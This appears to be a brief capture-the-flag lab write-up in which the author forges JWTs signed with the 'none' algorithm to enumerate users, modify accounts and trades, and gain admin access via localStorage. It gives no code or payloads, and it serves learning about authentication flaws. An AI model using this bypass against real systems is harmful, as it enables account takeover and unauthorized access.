Shady Oaks

We're back to selling and buying stock, equipped with the hint JWT.

This was a pretty straightforward lab. On the endpoint /api/verify I could easily enumerate all the users, simply by modifing the ID on the JWT and signing it with the none algorithm.

I could do all kinda things with this token, change the email, full name, buy or sell stock. I could to everything, except finding the actual bug 🪲. Then I tried putting the JWT inside my localStorage.

This did the trick. I hit refresh and became admin. The admin panel gave away it's secrets like a kid spilling dark family secrets for some candy, and I had one more flag 🇧🇪

PreviousNecromancers Notebook NextXXE

Last updated 3 months ago